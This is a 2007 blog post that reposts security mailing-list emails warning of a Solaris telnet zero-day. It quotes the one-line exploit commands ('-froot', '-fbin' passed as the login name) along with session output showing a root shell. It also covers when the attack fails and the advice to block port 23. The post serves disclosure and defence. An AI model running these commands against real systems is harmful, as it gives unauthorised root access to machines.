Sunday, February 11, 2007

[Dshield] Solaris Telnet 0-day (Important!)

This morning , I received email from Dshiled about Solaris Telnet 0-day. The article about this issue:

You also can read this email:
Email 1:
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
if you have any details about the use of this exploit.

Email 2:
On systems where the above fails with "Not on system console",
assume that the machine is secure, because the following does work,
and is one step from root:
telnet -l "-fbin" [hostname]
The above is from my testing with Solaris 10, so get ready to start

Email 3:
HD is not 100% accurate. It can be -froot if and only if you have
commented the CONSOLE setting within /etc/default/login . This
setting prevents network logons to root account and is set by
default. However, I have seen some admins comment it out as they had
been able to do logins to the root account in other unix or linux
distributions. Below is an excerpt for a test on a system that has
that setting commented.

% telnet -l "-froot"
Connected to somehost (
Escape character is '^]'.
Last login: Sun Feb 11 15:08:17 from myhost
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
# id
uid=0(root) gid=0(root)

With the console setting in its default state you get the below

% telnet -l "-froot"
Connected to somehost (
Escape character is '^]'.
Not on system console
Connection closed by foreign host.

If you try userids with non standard shells such as /bin/false or
one similar to the one in the jass package will also kick the end
user out. Users that have been locked (passwd -l userid ) will also
be booted out with a "Login incorrect" message.
Hope this helps everyone understand how much risk they have.

That's why i don't like to use Solaris......hehehehe....

1 comment:

Anonymous said...

Your blog keeps getting better and better! Your older articles are not as good as newer ones you have a lot more creativity and originality now keep it up!